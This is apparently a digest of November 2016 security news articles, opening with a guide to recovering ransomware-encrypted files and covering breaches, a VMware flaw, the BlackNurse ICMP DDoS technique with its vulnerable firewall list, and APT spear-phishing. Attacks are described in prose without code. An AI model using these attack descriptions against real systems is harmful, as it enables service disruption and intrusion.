They block the system showing a ransom page on the computer desktop where they intimidate the victim with a message and ask him to pay a ransom in order to unlock the machine.
Data-Locker Ransomware:
They encrypt a large amount of user data avoiding the encryption of the system files (in order to let the machine working) and then ask a ransom to unlock those files.
The main goal of the ransomware is to extort money from their victims using some technique (locking system, encrypting files) that can target different devices (desktop, laptop, tablet, smart watch, smart tv, smartphones) and different operating system (Windows, Linux, Os X).

When you get infected by a ransomware?
Anytime your system asks you to pay. As we said the main goal of the ransomware is to get money from their victims so the first action the ransomware does after an infection is to show a window containing the instructions (the ransom note) to make a payment trough a cryptocurrency, such as bitcoin.
It will never exist a ransomware that infects your system and will remain stealthy.

In this guide we will focus on the Data-Locker Ransomware that target the Windows operating system.

There are a lot of types of ransomware and every type, known as a family, act in a different way so there isn’t a general and always working methodology to recover your data.

Once you get infected by a ransomware you have to follow those steps if you want to restore your files and your system:

Unlock the screen and bypass the screen lock of the ransomware;
Restore/Decrypt the files;
Disinfection and removal of the ransomware persistence files.
Note that guide aims just to recover your encrypted files and not for the removal and disinfection of your machine.
We strongly recommend, once you recovered your files, to save them on an external drive and remove the ransomware from the system (or format the drive), because sometimes it could happen that ransomware trigger again its activity and encrypt all of your files recovered.
Some modern ransomware combines the technique of data-locker ransomware and pc-locker ransomware so you need to unlock the screen and bypass the screen lock of the ransomware before you start to recover your encrypted files.
In that case, we recommend runnig the operating system in safe boot with networking before you start to follow our methods to recover your files.
This avoids also to fight against some mechanism where the ransomware would delete the files after an amount of time.

The following methods we are explaining aren’t a way to fight this threat, the best way to fight ransomware are frequent backup and prevention.
That means if you get infected by a ransomware it’s already “late” and, also if a lot of researchers are fighting this threat developing ad-hoc decryption tool, there are some ransomware family really hard to deal with.

METHOD 1: Identification and Decryption Tool

If you get infected by a ransomware and you want to ask for helping other users (i.e. Forums, IRC, email…) or you want to check if some security firms have developed a decryption tool for that specific ransomware you have to recognize the family name of the ransomware.

Thanks to the malwarehunterteam, they set up a free web service that lets you host an infected file (or ransom note) and it will detect the ransomware family name and, in some cases, it will guide you to decrypt your files of that family.

ID Ransomware

Following a step-by-step real case of using this method to decrypt files from ransomware Teslacrypt 4.0


As we can see from the above image the id-ransomware home page allow you to upload a ransom note or a sample encrypted file for the family recognition.
In the case of Teslacrypt 4.0 we will use a ransom note because that family doesn’t add an extension to encrypted files so it would be more difficult to detect the family if we try to identify it by the encrypted file.
We strongly recommend to don’t upload huge files because the recognition doesn’t improve with the size of a file, that means it would be just a waste of resources.


Once the upload is completed, you have the result with the family name spotted by id-ransomware that matched the pattern matching of the ransom note uploaded.
In that case, Teslacrypt 4.0 is recoverable and they provide us a link that explains how to decrypt the files and which tools use.


We download the tool to decrypt our files developed by BloodDolly and we first need to set the key used by the ransomware to encrypt our files.


We need to do this because this is a multi purpose decryption tool for all the Teslacrypt versions (1 to 4).
Selecting the extension appended to the encrypted files by the ransomware will allow the tool to set the master key automatically.
In our case (Teslacrypt v 4) we will select the last one <as original> because that ransomware left unchanged the extension of our encrypted files.


Once we set up the key we can start to recover our files.
In our case, that tool decrypts the 100% of our files, as we can see in the following picture.


We also recommend to give Google a chance digiting “ <ransomware_family_name> decryption tool “ and look around if there is a decryption tool developed and not spotted by id-ransomware (rarely).

METHOD 2: Recover from shadow copies

The shadow copies service is a set of COM interfaces that implements a framework to allow volume backups to be performed while applications on a system continue to write to the volumes.
For example, when we took a restore point we are also saving a volume backup (containing the shadow copies) and we can restore files from that backup.
This is a built-in feature of all windows operating systems starting from win XP so, most probably, you have your shadow copies and you don’t know about it.

We will use a free tool that allows us to inspect in our shadow copies, this tool is called shadow explorer and you can download here.
Note that if you have Windows XP you have to download the old version of this tool.
If you renamed the vssadmin.exe utility for security reason, you must rename it and let it work normally if you want that tool will run correctly.

Following a step-by-step real case of using this method to restore files from ransomware Jigsaw.


The main window of shadow explorer allows us to choose the drive, we want to explore the shadow copies and the date of the shadow copies we want to consult, because it can be there are more than 1 snapshot of the volume back-up (i.e. 2 or more restore point).


Once you identify the data you want to recover you can right-click on the folder and you can export the files.


In our case, we recovered 100% of our files as we can see in the above picture because Jigsaw ransomware doesn’t delete the shadow copies.
This method is really effective not on the host infected directly by the ransomware because most ransomware delete shadow copies through vssadmin tool.
It’s really effective when ransomware spread over the network encrypting the files on all host linked to the local network and it can’t access to operating system functionalities like vssadmin utility.
So we have still the shadow copies alive on all the machine hit by ransomware indirectly.

We strongly recommend disabling vssadmin.exe service to prevent the ransomware deleting the shadow copies of windows that, in most cases, let the victim restore the files encrypted on the operating system hard drive.

METHOD 3: Data recovery tool

Data recovery is, simply, the salvaging and repair of data that has been lost.
Of course, data recovery won’t always be possible; sometimes a system can be too corrupted or damaged to get much of the data back.

In this guide we won’t cover the techniques used by data recovery tools to restore data, what we have to know is that the success of files recovering depends on a lot of variables (like operating system partitioning, priority on file overwriting, drive space handling …). If you want to have more information you can check this.

There are a lot of data recovery tools available on the web, you can check a list here.
In this guide, we will use a free data recovery tool called Recuva.

Following a step-by-step real case of using this method to restore files from ransomware Locky.Odin.


We strongly recommend to install Recuva on an external USB drive instead of installing it on your OS drive to increase the probability to recover your files.

Once installed, it will be prompted a wizard for a scan, we recommend to close it in order to set the following options for the scanning phase:


We recommend to set those options because by default they are not enabled.
Activating “Restore folder structure” will allow us to keep the directory tree structure and permit us to infer the name of all our encrypted files.

Then we can run our scan on the desired drive and wait for it:


When Recuva will finish scanning all the deleted files, it will prompt a window where you have all possible recoverable files.
Of course, not all the files can be recovered.
On the “State” tab we can realize if we can recover that file.
The “partly recoverable” files are that file that cannot be whole recovered, for example a txt file would contain half text recovered and other half corrupted.

On the “Comment” tab we can recognize the encrypted renamed files with the original name files.
In this way, also if we can’t recover the file, we can recover the filename.
We can check all the files we want to recover and decide where to export.

In the right corner we have the “switch to advanced mode” button that let us apply filters, based on the path of the files, on our recoverable files.
So we will apply the following filters:
C:\Personal_Data, C:\Users\Administrator\Personal_Data, C:\Users\Administrator\Desktop\Personal_Data
and we will check all the files we want to export.

We strongly recommend exporting all the data on an external drive in order to have more probability to recover more data.


On a total of 3002 files we have 915 files fully recovered that means the 30% and we considered just the fully recovered files.

This method is also useful for recovering the name and the path of the files encrypted because some ransomware rename our files in a random digits name and we can’t even recognize which file we lost.


So how much effective are our methods?
We decided to group up a set of ransomware samples (the most recent families) and run them in our virtual machine in order to test the % recovered files of our methods.

To evaluate the recovering rate of each method for each ransomware we will use a folder (Personal_Data) containing 1000 elements (containing pdf, jpg, ppt, txt, doc, xls), placed in 3 different locations on the system:

Then we will try to recover our files using our methods. We will calculate the % rate of successfully recovered files for each folder and we will execute this try running the ransomware 3 different times in different system states, in the end we will report an average of the % rate of recovered files.
For our test we will use the following samples of ransomware:

Cerber v.1 md5: 9a7f87c91bf7e602055a5503e80e2313
Jigsaw md5: 2773e3dc59472296cb0024ba7715a64e
TeslaCrypt v.4 md5: 0265f31968e56500218d87b3a97fa5d5
CryptXXX v.2 md5: 19127d5f095707b6f3b6b027d7704743
Bart md5: d9fe38122bb08d96ef0de61076aa4945
CryptXXX v.4 md5: 631c36f93b0fc53b8c7be269b02676d0
Bart v.2 md5: 4741852c23364619257c705aca9b1be3
Satana Ransomware md5: 46bfd4f1d581d7c0121d2b19a005d3df
Odin md5: 01f7db952b1b17d0a090b09018896105
Crypt888 md5: 86c85bd08dfac63df65eaeae82ed14f7


CrySis ransomware decryption keys published online
18.11.2016 securityaffairs Virus

The decryption keys for the CrySis ransomware were posted online on the forum by a user known as crss7777.
Good news for the victims of the CrySis ransomware, on Sunday the master decryption keys were released to the public. Security experts from Kaspersky Lab have already included the decryption keys in the Rakhni decryptor allowing victims of CrySis versions 2 and 3 to recover their files.

The decryption keys for the CrySis ransomware were posted online on the forum by a user known as crss7777 who shared a link to a C header file containing the actual master decryption keys and information on how to utilize them.

“In a surprise move, the master decryption keys for the CrySiS Ransomware have been released early this morning in a post on the forums. At approximately 1 AM EST, a member named crss7777 created a post in the CrySiS support topic at BleepingComputer with a Pastebin link to a C header file containing the actual master decryption keys and information on how to utilize them,” wrote Lawrence Abrams from BleepingComputer.

“These keys have already been used by Kaspersky Labs to update their RakhniDecryptor program so that it can be used to decrypt victim’s files.”

CrySis ransomware Taken from

Lawrence Abrams speculates the user crss7777 could be a member of the development team.

“Though the identity of crss7777 is not currently known, the intimate knowledge they have regarding the structure of the master decryption keys and the fact that they released the keys as a C header file indicates that they may be one of the developers of the CrySiS ransomware,” said Abrams.

“Why the keys were released is also unknown, but it may be due to the increasing pressure by law enforcement on ransomware infections and the developers behind them.”

The CrySis ransomware was first spotted in February by experts at Eset, the malware has infected systems mostly in Russia, Japan, South and North Korea, and Brazil.

The threat is spread via email attachments with double file extensions or via malicious links embedded in spam emails.

The CrySis ransomware appends the .xtbl extension to the encrypted files, the files are renamed following the following format [filename].id-[id].[email_address].xtbl. published detailed instructions to decrypt the files.

CVE-2016-7461 code execution flaw affects VMware Workstation
18.11.2016 securityaffairs Vulnerebility

VMware has patched a critical out-of-bounds memory access vulnerability, tracked as CVE-2016-7461, affecting its Workstation and Fusion products.
The flaw, that resides in the affects the drag-and-drop function, can be exploited by attackers to execute arbitrary code on the host operating system running Fusion or Workstation.

The security vulnerability affects Workstation Player and Pro 12.x, and Fusion (Pro) 8.x., while the ESXi is not affected.

The flaw war reported hacking contest 2016 PwnFest held in South Korea at the 2016 Power Of Community (POC) security conference. The hackers earned $140,000 for the Windows Edge hacks, while Qihoo hacker team and Lee earned $150,000 for the hack of the VMware Workstation 12.5.1.

CVE-2016-7461 vmware-workstation-33

VMware patched the vulnerability with the release of versions 12.5.2 and 8.5.2.

“Problem Description

a. VMware Workstation and Fusion out-of-bounds memory access vulnerability

The drag-and-drop (DnD) function in VMware Workstation and Fusion has an out-of-bounds memory access vulnerability. This may allow a guest to execute code on the operating system that runs Workstation or Fusion.” states the advisory published by VMware.

VMware explained that the flaw cannot be exploited against Workstation Pro or Fusion when both the drag-and-drop and copy-and-paste functions are disabled, while it remains exploitable on Workstation Player.

Recently VMware released several security updates to fix the local privilege escalation flaw in Linux kernel, also known as Dirty COW, tracked as CVE-2016-5195.

“The Linux kernel which ships with the base operating system of VMware Appliances contains a race condition in the way its memory subsystem handles copy-on-write (aka “Dirty COW”). Successful exploitation of the vulnerability may allow for local privilege escalation. The product lines listed in this advisory have been confirmed to be affected.” reads the advisory from

Security patches for Identity Manager, vRealize Automation and version 5.x of vRealize Operations are still pending.

NIST Small Business Information Security guide for Small businesses
18.11.2016 securityaffairs Safety

The NIST Small Business Information Security: The Fundamentals guide aims to provide basic cybersecurity recommendations to small businesses.
I have always stressed the necessity to improve cyber security posture for small businesses that are most exposed to threat actors across the world. Now the National Institute of Standards and Technology has released a cybersecurity guide to support small businesses in securing their IT infrastructure.

The NIST “Small Business Information Security: The Fundamentals” guide aims to provide basic cybersecurity recommendations for small businesses through a risk assessment process.

“Businesses of all sizes face potential risks when operating online and therefore need to consider their cybersecurity,” she said. “Small businesses may even be seen as easy targets to get into bigger businesses through the supply chain or payment portals.” reads the NIST announcement.

“Many small businesses think that cybersecurity is too expensive or difficult; Small Business Information Security is designed for them,” Toth said. “In fact, they may have more to lose than a larger organization because cybersecurity events can be costly and threaten their survival.” In fact, the National Cyber Security Alliance found that 60 percent of small companies close down(link is external) within the six months following a cyberattack.


This guide is an important exercise for small-business owners that are not experienced in cybersecurity, it explains to them how to protect their information systems from cyber threats.

The Small Business Information Security: The Fundamentals guide proposes a classic approach that follows the IDENTIFY/PROTECT/DETECT/RESPONSE/RECOVER steps focusing on understanding and managing risks for small businesses. The guide also includes worksheets that could be used by small businesses to identify the information they manage. It is essential to assess the information assets and identify potential risks to it.

Of course, the guide is based on NIST’s Framework for Improving Critical Infrastructure Cybersecurity, which was issued in 2014.

The NIST highlighted that the new guide describes how to:

limit employee access to data and information;
train employees about information security;
create policy and procedures for information security;
encrypt data;
install web and email filters; and
patch, or update, operating systems and applications.
The guide also suggests install surge protectors and uninterruptible power supplies, considering to transfer the risks with cybersecurity insurance; and find reputable cybersecurity contractors.

The hacker Kapustkiy continues to target embassies and universities
18.11.2016 securityaffairs Hacking

The hacker Kapustkiy is back and breached another embassy and two universities. He leaked data on Pastebin.
The security pentester who goes online with the moniker Kapustkiy continues to target organizations and embassies across the world.

Recently he breached the Paraguay Embassy of Taiwan (, while a few days ago the hacker and his friend Kasimierz (@Kasimierz_) hacked the Indian Embassies in Switzerland, Mali, Romania, Italy, Malawi, and Libya. Kapustkiy and his friend Kasimierz (@Kasimierz_).

The last victims of the hacker are two subdomains of Virginia University & Sub domain of University of Wisconsin ( ) and another embassy, the Indian Embassy in New York ( )

Kapustkiy @Kapustkiy
Virginia & Wisconsin Sub Domain #Hacked #Leaked
17:52 - 12 Nov 2016
1 1 Re 2 2 Mi piace
He contacted me via Twitter to report the data breaches, in the case of the Indian Embassy in New York he explained to have leaked only a small portion of stolen data that doesn’t include US personnel.

“Hi, Its me Kaputski, A few weeks ago I breached several websites that were related to the Indian ShitEmbassy. So I thought they will fix all the vulnerables in there domains and also look at there other domains that maybe could have a simple ”SQLi” vulnerable. So guess what? they did not look at all and only fixed some of there domains SMH……….” wrote Kapustkiy.

“I’m tired to report all the errors that I find in there website that I decided to breach them, NOW FIX YOUR SECURITY FUCKING ADMINS! NOTE: There was also a table named ”Newyork_contact” which had 7000 entries. I didn’t leak that out of privacy of people. Also the table ”Newyork_registration” had also information like Address,City,zipcode,phone number” I only leaked this but it could be more.”.

The databases related to universities include users personal information such as names, login, passwords, phone and many other information of students and staff.

As you can see in same cases the passwords are stored in plain text.


Records belonging to the hacked embassy include also phone numbers, let me highlight once again that such kind of information is a precious commodity for nation-state hackers that intend to launch a spear phishing campaign against diplomats.

Kapustkiy explained to have leaked the data because the administrators of the targeted entities ignore his warning via email.

It is likely Kapustkiy exploited SQli injection flaws in the last string of data breaches.

Who is the next one?

Russia is going to ban LinkedIn after court ruling. What’s next?
18.11.2016 securityaffairs Social

Russia is going to ban Linkedin after a court ruling that found the professional social network to be in violation of the country’s data protection laws.
violation of the country’s data protection laws.

On Thursday, a Moscow court has confirmed the decision to ban the professional social network LinkedIn in Russia. LinkedIn is violating the country’s data protection laws that ask foreign and Russian companies to store personal data of Russian users within the country’s borders since Sept. 2015.

This summer a court ruled in favor of Roskomnadzor, the Federal Service for Supervision in the Sphere of Telecom, Information Technologies and Mass Communications, explaining that LinkedIn company didn’t comply with Russian law.

LinkedIn it is not storing information about Russians on servers inside the country, and it is processing information about third parties who aren’t registered on the site and haven’t signed the company’s user agreement.

The Russian Personal Data Law was implemented since September 1st, 2015, it requests foreign tech companies to store the personal data of Russian citizens within the country. The Law was designed for protecting Russian citizens from surveillance activities of foreign agencies such as the NSA.

“On Aug. 4, Moscow’s Tagansky Court approved a request from Russia’s communications watchdog Roskomnadzor to add LinkedIn to a list of Internet sites that violated Russia’s personal data laws. ” reported the Moscow Times

“On Sept. 1 2015, amendments to the law “On Personal Data,” which requires the localization of personal data on the territory of Russia, came into effect. Any Russian or foreign company working with Russian users must ensure recording, systematization, accumulation, storage and clarification of personal data of Russians using databases on Russian territory.”


LinkedIn is just the first firm that could be targeted by the Roskomnadzor which is now threatening other tech giants, including WhatsApp, Facebook, and Twitter.

‘’The Russian court’s decision has the potential to deny access to LinkedIn for the millions of members we have in Russia and the companies that use LinkedIn to grow their businesses. We remain interested in a meeting with Roskomnadzor to discuss their data localization request.” “reads a statement from Linkedin.

Some companies like Google and Apple have already moved some of their infrastructures to Russia this year, differently from Microsoft, Facebook and Twitter that decided not to comply with the Russian law.

The ban could take effect today, with Russian internet service providers blocking access to LinkedIn. LinkedIn could still appeal the court’s decision to avoid being blocked across the country.

Russia isn’t the unique country that is going to adopt a similar law, the Germany passed similar legislation that forces tech companies to store German users’ data on servers located in the country.

“A number of American tech companies are investing billions of dollars combined to build data centers across Europe to comply with such rules.” reported the NYT.

In Brazil, a judge also blocked WhatsApp, the internet messaging service, after the company, which is owned by Facebook, refused to hand over data to help in a criminal investigation.

In May, a Brazilian judge ordered to block access to the WhatsApp messaging service for 72 hours, it was the second time in five months.

Brazilian authorities ordered ISPs to block WhatsApp in a dispute over access to encrypted data. The order to block the messaging service for 72 hours has been issued by a judge from the Brazilian state of Sergipe, the ISPs were obliged to comply the order to avoiding face fines.

According to the Brazilian newspaper Folha de S.Paulo the ban impacted more than 100 million Brazilian users.

Were the Recent Arrests in Ohio Part of ISIS ’ Catastrophic Plan for the US?
18.11.2016 securityaffairs Cyber

On November 7, Southern Ohio’s Joint Terrorism Task Force (JTTF) arrested Aaron Travis Daniels, of Ohio, on terror-related charges as he was attempting to travel to Libya to become an ISIS fighter.
Daniels, age 20, who goes by the aliases Harun Muhammad and Abu Yusef, had allegedly “communicated his commitment to violent overseas jihad” in addition to having wired money to an ISIS recruiter and “external attack planner,” according to the Department of Justice.

Daniels is being held without bond. The arrest comes just days after it was reported that ISIS was planning an onslaught of attacks around the world, including quite possibly Chardon, Ohio. Chardon is a town in which BLACKOPS Cyber, a private intelligence company, caught ISIS communications regarding hacking internet surveillance cameras which can assist terrorists not only in carrying out attacks, but in doing so undetected.

ISIS chardonohio-676x450

Though it is uncertain as to whether the arrest was related to that ISIS plot, Daniels had also allegedly wired money to an intermediary of now-deceased Abu Isa Al-Amriki, who was an ISIS recruiter and attack strategist.

Also in Ohio, the Islamic State instructed Munir Abdulkader to kill a U.S. service member and attack a police station.

“‘Abdulkader was specifically tasked by Hussein and ISIL with killing an individual in the United States,’ Court Documents provided to The DCNF from the Program on Extremism at The George Washington University reveal. Abdulkader’s director Junaid Hussian a British teenager was reportedly killed by a U.S. drone strike outside of ISIS’s capital city of Raqqa.

Abdulkader was reportedly an Eritrean immigrant to the U.S. and became a naturalized U.S. citizen in 2006. University records show he was once enrolled at Xavier University, and the University of Cincinnati.”
On July 7, Abdulkader pled guilty “to attempting to kill officers and employees of the United States, possession of a firearm in furtherance of a crime of violence and providing material support to ISIS. The sentencing memorandum states that, “the Defendant placed himself under the direction and control of a pernicious foreign terrorist organization and plotted with that organization to conduct multiple murderous attacks in the Cincinnati area.”

Abdulkader was reportedly cautioned by Hussain that traveling to Syria was too much of a risk, so he should “consider a violent attack within the United States” instead.

The terror-linked arrests in Ohio may be indicative of calls ISIS has made on numerous occasions in regard to the U.S.:

In the May 2015 issue of Dabiq, the official magazine of the ISIS, warns that the “the Islamic State… have every intention of attacking America on its home soil… looking to do…something that would make any past operation look like a squirrel shoot…something truly epic.”
In a recent court case, several Minnesota men were nabbed while plotting to join ISIS and bring fighters into the U.S., through the southern border.
According to a report by Rep. Duncan D. Hunter (R-CA), at least 10 ISIS fighters have been caught trying to enter the U.S. through the southern border (and, that was in 2014).
Following a Brussels attack earlier in the year, threats of future attacks, such as the following, were posted on social media: “What will be coming is worse.” And, “With the permission of God, the lions came to take revenge for the killing of Muslims in Syria and Iraq.” Many of the messages contained graphic images from the attacks.
In April, the number of terrorists in the U.S. Surged to an unprecedented level – up 180%, with fewer leaving to fight jihad elsewhere.
Terrorist migration and a fresh wave of terror attacks is forecast for the U.S. According to FBI Director James Comey, an unprecedented surge of ISIS fighters will advance into Western nations as the terror group has been losing ground in Iraq and Syria.
Around a year ago, Islamic State spokesman Abu Muhammad al-Adnani, who has since been killed, disclosed the terrorist group’s plans for Christians, Jews & The U.S.
“And Tomorrow in Britain and America” — ISIS-Affiliated Media Sends Chilling Warnings
These threats are made even more chilling by the fact that the FBI has repeatedly stated the bureau is overwhelmed by the number of terror-related cases in the U.S. The FBI has said it has over 1,000 active cases related to ISIS open. You can help by reporting suspicious activity related to terrorism. Your attentiveness can save lives.

AdultFriendFinder company data breach exposes 412 million accounts
18.11.2016 securityaffairs Crime

The company that owns AdultFriendFinder and other adult websites has been hacked, data breach exposes 412 million accounts making this the largest 2016 hack
Almost every account password was cracked, thanks to the company’s poor security practices. Even “deleted” accounts were found in the breach.

A new massive data breach is in the headlines, the victim is the adult dating and entertainment website Friend Finder Network. The data breach has exposed more than 412 million accounts, 339 million of which from the and over 15 million “deleted” accounts that were still present in the database.

A close look at the databases revealed that 62 million belong to, and 7 million from, the remaining records come from other brands of Friend Finder Network.

Below data provided by the data breach notification LeakedSource that examined the stolen data:

“Friend Finder Network Inc is a company that operates a wide range of 18+ services and was hacked in October of 2016 for over 400 million accounts representing 20 years of customer data which makes it by far the largest breach we have ever seen — MySpace gets 2nd place at 360 million. This event also marks the second time Friend Finder has been breached in two years, the first being around May of 2015.” reads the post published by LeakedSource.

A list of sites we have verified, how many affected accounts and a brief description are as follows:
339,774,493 users
“World’s largest sex & swinger community”
62,668,630 users
“Where adults meet models for sex chat live through webcams”
7,176,877 users
Adult magazine akin to Playboy
1,423,192 users
Another 18+ webcam site
1,135,731 users
“Free Live Sex Cams”
Unknown domain
35,372 users
It seems that attackers exploited a local file inclusion flaw in the AdultFriendFinder website that was first reported by the security researcher known as Revolver.

Revolver explained that the exploitation of the flaw on the AdultFriendFinder site could allow a remote attacker to run malicious code on the target web server.

It is still a mystery who is behind the data breach, Revolver denied any involvement in the attack, he blamed users of Russian hacking site instead.

This is the second time Friend Finder Networks is breached by hackers, the first attack occurred in May of 2015 when the attackers exposed almost 4 million accounts.

The analysis of the three largest site’s databases revealed that stolen data includes email addresses, usernames, passwords, site membership data, the IP address last used to log in, and date of the last visit.

The databases don’t contain sexual preference information, unlike the previous data breach.

The users’ passwords were either stored in plaintext or hashed with the SHA-1, which makes easy for hackers to crack them.

LeakedSource already crack 99 percent of all the passwords included in the databases.

Below the list of the Top Ten Passwords from AdultFriendFinder website:


LeakedSource also published a table of top email providers used, from only. The vast majority emails are (96,487,200), (74,563,930), and (61,754,102).

“There are 5,650 .gov registered emails on all websites combined and 78,301 .mil emails.” states LeakedSource.

LeakedSource confirmed that it will not make the data searchable by the general public for various reasons.

BlackNurse attack, how to knock big servers offline with a laptop
18.11.2016 securityaffairs Attack

BlackNurse attack allows to power massive DDoS attacks that are able to knock large servers offline with limited resources.
Researchers discovered a simple method, called BlackNurse attack, to power massive DDoS attacks that could allow lone attackers to knock large servers offline with limited resources.

“This attack is not based on pure flooding of the internet connection, and we have named it ‘BlackNurse’. BlackNurse is not the same as an old ICMP flood attack which is known to send ICMP requests to the target very quickly. BlackNurse is based on ICMP with Type 3 Code 3 packets. ” reads the analysis published by the researchers.

BlackNurse attack DDoS

The BlackNurse attack was devised by researchers from Danish TDC Security Operations Center, it could be effective against servers protected by certain firewalls made by Cisco Systems, Palo Alto Networks, SonicWall, and Zyxel.

“The BlackNurse attack attracted our attention, because in our anti-DDoS solution we experienced that even though traffic speed and packets per second were very low, this attack could keep our customers’ operations down. This even applied to customers with large internet uplinks and large enterprise firewalls in place. We had expected that professional firewall equipment would be able to handle the attack.” continues the report.

The BlackNurse attack leverages on the ICMP with Type 3 Code 3 packets that are used by routers and networking equipment to send and receive error messages.

By sending this specific type of ICMP packets attackers can overload the CPUs of certain types of server firewalls.

The researchers noticed that after reaching a threshold of 15 Mbps to 18 Mbps, the network devices drop so many packets that the server will go offline.

The researchers from the TDC SOC explained that the BlackNurse attack could allow a lone attacker with a single laptop to power DDoS attacks peaking of 180 Mbps.

“It does not matter if you have a 1 Gbit/s Internet connection. The impact we see on different firewalls is typically high CPU loads. When an attack is ongoing, users from the [local area network] site will no longer be able to send/receive traffic to/from the Internet. All firewalls we have seen recover when the attack stops.” reads the analysis of the TDC SOC.

The experts confirmed that in the last two years other 95 DDoS attacks leveraging on the ICMP protocol targeted customers inside the TDC network, but it is not specified how many of them are BlackNurse attacks.

Experts from Netresec who supported the TDC network in the analysis confirmed that attack works against several models of firewalls from major vendors, including Cisco Systems, Palo Alto Networks, SonicWall, and Zyxel.

Devices verified by TDC to be vulnerable to the BlackNurse attack:

Cisco ASA 5506, 5515, 5525 (default settings)
Cisco ASA 5550 (Legacy) and 5515-X (latest generation)
Cisco Router 897 (unless rate-limited)
Palo Alto (unverified)
SonicWall (if misconfigured)
Zyxel NWA3560-N (wireless attack from LAN Side)
Zyxel Zywall USG50
The researchers at published a detailed analysis of the BlackNurse attack.

Palo Alto Networks has issued a specific advisory to address this specific DDoS attack.

Donald Trump will control the NSA – what this means for your privacy
18.11.2016 securityaffairs BigBrothers

Earlier this week, Donald Trump won a stunning election victory that will put him in charge of the world’s most powerful mass surveillance infrastructure.
Regardless of which side of the political spectrum you are on, Trump’s control over the NSA is now an indisputable fact, and we think it is worth taking a closer look at what this means. It is important to note that as a Swiss company which benefits from Swiss government support, ProtonMail follows the Swiss policy of neutrality. We do not take any position for or against Trump, nor any position for or against any particular country or government. We believe privacy is an universal value, so we do not take any sides.

However, given America’s significant influence on the world, and the large number of ProtonMail users who come from the US, we are not a disinterested party. Furthermore, we realise that the implications of a Trump presidency also interest a large proportion of the ProtonMail community, so we are here today to offer our unbiased opinion.

How much power over the NSA does Trump have?
Due to the way the US government is structured, President Trump will have a large amount of control over the NSA. The NSA is not different from any other federal agency which the president controls. The US president will be able to dictate how the agency operates through his power to appoint the NSA Director. The NSA Director needs to be confirmed through majority vote by the US Senate, but due to Republican control over the Senate, President Trump will have complete freedom to appoint anyone he wants to carry out his orders.

As a federal agency however, the activities of NSA are governed by federal law, in particular, the Foreign Intelligence Surveillance Act. However, with Republican control over both houses of Congress, President Trump would have broad power to rewrite FISA as he sees fit or introduce a new law. Of course, a new law could be subject to court challenge which could eventually work its way up to the US Supreme court, but Trump is also expected to gain control over the Supreme court. Therefore, all things considered, there is no denying that President Trump would have broad powers to re-shape the US surveillance apparatus to serve his agenda.

Should Americans Be Worried?
Since Trump’s victory, the number of new users coming to ProtonMail has doubled compared to the previous week.Many of our new users have voiced a few common concerns both on Twitter and also in emails to us. Given Trump’s campaign rhetoric against journalists, political enemies, immigrants, and Muslims, there is concern that Trump could use the new tools at his disposal to target certain groups. As the NSA currently operates completely out of the public eye with very little legal oversight, all of this could be done in secret.

ProtonMail new user signups doubled immediately after Trump’s election victory.

It is not Trump’s fault
It is tempting to blame all this on Trump and his supporters, but that is taking the easy way out. All Trump does is put a new face on the existing privacy problem, so now it concerns a segment of the population that previously didn’t care as much. ProtonMail users have always come from both the left and right side of the political spectrum. Today, we are seeing an influx of liberal users, but ProtonMail has also long been popular with the political right, who were truly worried about big government spying, and the Obama administration having access to their communications. Now the tables have turned.

The same terror the political right has experienced is now being felt in liberal bubbles such as Silicon Valley for the first time. The left is correct to be terrified of a Trump-led NSA snooping on their communications, especially since Silicon Valley giants like Google and Facebook can be forced to spy on users on behalf of Trump’s NSA. However, this precedent was not set by Trump – he hasn’t even taken office yet. The first major incident of a US tech giant being complicit in US government spying actually took place in 2015 under the Obama administration.

Privacy is something we must all champion
One of the problems with having a technological infrastructure that can be abused for mass surveillance purposes, is that governments can and do change, quite regularly in fact. This demonstrates that privacy isn’t just a liberal or conservative issue, it is something that we all need to champion, regardless of our political leanings. This is why ProtonMail is committed to building a safe haven for all people in the world, regardless of nationality, political views, or religious beliefs.

The only way to protect our freedom is to build technologies, such as end-to-end encryption, which cannot be abused for mass surveillance. Governments can change, but the laws of mathematics upon which encryption is based, are much harder to change.

What can you do to protect your privacy rights?
Privacy is a non-partisan issue, and we hope politicians around the world wake up to the fact that privacy is not only essential for democracy, it is also critical for securing the growing digital economy. In the case of encrypted email services such as ProtonMail, you even get better security in addition to the privacy. Privacy is a cause that we should all be able to unify behind, regardless of political beliefs.

In the meantime, there are fortunately a growing number of services which can help to keep government spies out of your communications, so there is no need to worry regardless of who wins the election. For securing your email, ProtonMail offers free encrypted email accounts, although you can support ProtonMail by donating or upgrading to a paid account.

For defending against NSA mass surveillance, we also recommend the Signal messaging app, using a VPN service, or using an alternative search engine such as or But most importantly, spread the word about the dangers of mass surveillance so politicians take note and make protecting our digital rights a priority.

About the author The ProtonMail Team

Donald Trump will control the NSA – what this means for your privacy

Pawn Storm APT conducted spear-phishing attacks before zero-days was fixed
18.11.2016 securityaffairs APT

The Pawn Storm APT group exploited some zero-days vulnerabilities in targeted attacks across the world before they get patched.
The Pawn Storm APT group, also known as APT28 and Fancy Bear, exploited some zero-days flaw in targeted attacks before they get patched.

The threat actors powered spear phishing attacks between the discovery of the zero-days and the release of the security patches. This is what has happened between October and early November when the Pawn Storm APT targeted governments and embassies around the world.

The zero-days exploited by the Pawn Storm are the Adobe’s Flash CVE-2016-7855 flaw that was fixed on October 26, and the privilege escalation CVE-2016-7255 flaw in Windows OSthat was fixed on November 8, 2016.

After the CVE-2016-7855 was fixed, the Pawn Storm started to use it in several spear phishing campaigns against still-high-profile targets since October 28 until early November.

In November the Pawn Storm ATP launched spear-phishing campaigns against various governments leveraging on emails with the subject line “European Parliament statement on nuclear threats.” The attackers forged the email addresses of press officer working for the media relations office of the European Union.

When the victim clicks on the link in the spear-phishing e-mail is it redirected to a domain hosting the exploit kit of Pawn Storm.

“The exploit kit will first fingerprint its targets with invasive JavaScript, which uploads OS details, time zone, installed browser plugins, and language settings to the exploit server. The exploit server may then send back an exploit or simply redirect to a benign server.” reads the analysis published by Trend Micro.


The researchers also detected other spear-phishing attacks From October 28 until early November 2016, attackers leveraged on a fake invitation for a real “Cyber Threat Intelligence and Incident Response conference in November” organized by Defense IQ.

The spear-phishing e-mail contained an RTF (Rich Text Format) document called “Programm Details.doc.”

The document has an embedded Flash file (SWF_CONEX.A) that downloads additional files from a remote server.

“Apart from these two campaigns, several others were also launched by Pawn Storm in the period between the discovery of the zero-days and the release of Adobe’s and Microsoft’s patches on October 26 and November 8, 2016.” continues the analysis. “This shows that Pawn Storm ramped up their spear-phishing attacks shortly after its zero-days were discovered. Not all organizations may have been able to immediately patch Adobe’s Flash, and the Windows vulnerability wasn’t patched until November 8, 2016.”

The analysis also includes the IoC for the above attacks.

